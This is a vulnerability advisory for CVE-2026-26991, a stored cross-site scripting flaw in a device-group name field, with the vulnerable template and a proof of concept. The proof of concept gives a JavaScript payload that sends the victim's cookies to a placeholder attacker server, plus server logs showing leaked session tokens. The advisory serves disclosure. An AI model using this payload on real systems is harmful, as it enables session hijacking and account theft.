CVE-2026-26991

Description

### Summary **/device-groups name Stored Cross-Site Scripting** - HTTP POST - Request-URI(s): "/device-groups" - Vulnerable parameter(s): "name" - Attacker must be authenticated with "admin" privileges. - When a user adds a device group, an HTTP POST request is sent to the Request-URI "/device-groups". The name of the newly created device group is stored in the value of the name parameter. - After the device group is created, the entry is displayed along with some relevant buttons like Rediscover Devices, Edit, and Delete. ### Details The vulnerability exists as the name of the device group is not sanitized of HTML/JavaScript-related characters or strings. When the delete button is rendered, the following template is used to render the page: _resources/views/device-group/index.blade.php:_ ``` @section('title', __('Device Groups')) @section('content') <div class="container-fluid"> <x-panel id="manage-device-groups-panel"> // [...Truncated...] @foreach($device_groups as $device_group) // [...Truncated...] <button type="button" class="btn btn-danger btn- sm" title="{{ __('delete Device Group') }}" aria-label="{{ __('Delete') }}" onclick="delete_dg(this, '{{$device_group->name }}', '{{ route('device-groups.destroy', $device_group->id) }}')"> // using the device's name in the Delete button functionality without sanitizing for XSS related characters/strings ``` As the device's name is not sanitized of HTML/JavaScript-related characters or strings, this can result in stored cross-site scripting. ### PoC - Login - Select Devices > Manage Groups - Select New Device Group - Input 12345');var pt=new Image();pt.src='http://<ATTACKER_IP>/cookie- - '.concat(document.cookie);document.body.appendChild(pt);delete_dg(this, '12345 into - the "Name" input box (change <ATTACKER_IP> to be an the IP of an attacker controlled webserver) - Select "access_points.accesspoint_id" as the Conditional input - Input 1 into the Conditional value input box - Select Save - Select the Delete Icon for the newly created Device Group - Select OK - The JavaScript payload is not sanitized and an HTTP request will be sent to the attacker controlled - server, leaking the user's cookies. ### Impact Attacker Controlled server's logs: ``` 192.168.1.96 - - [10/Feb/2026:13:32:25 -0600] "GET /cookie- jqCookieJar_options=%7B%7D;%20SWIFT_cookieconsent=dismiss;%20CookieAuth=%5B%22emai l%40email.c.com%22%2C%22%242y%2410%24zI.%5C%2F5BHghPssddSOjH6.Eek%5C%2F0hQNm8DewYh LnQxXHlpw3abw4C74y%22%5D;%20XSRF- TOKEN=eyJpdiI6InkrSlpHNFZ3TjRXbXl5clQ2ZVBHOFE9PSIsInZhbHVlIjoiZTROUHRCcGhYRGU4dVJL Z2RUUTZ5VXlGZElMNjZoT0E2cGRNZzVDRmtVWTg5YTBGNzdpTU83YU1EZ3E3Tk1BTm5tNjYxTExUV1Z0Mj BLNUlqOVl4MlpGL21xdHh3MUJwYm1zT1RaQXJwR0w5YmVXTkdKQWNXUkNvL1J2SzVtcWMiLCJtYWMiOiI0 ZTc4YjVmMjhiYjc3YTA2MDI5NjJkOTgzMTJlYmVkNGVhOTg0ZjE4ZjRlMzY1NmFlMjNiNmUyNzhlN2QwOG I4IiwidGFnIjoiIn0%3D HTTP/1.1" 404 492 "http://192.168.1.121/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" ```

Description

How to fix CVE-2026-26991

Is CVE-2026-26991 being exploited?

Affected packages (1)

CVSS scores

References (6)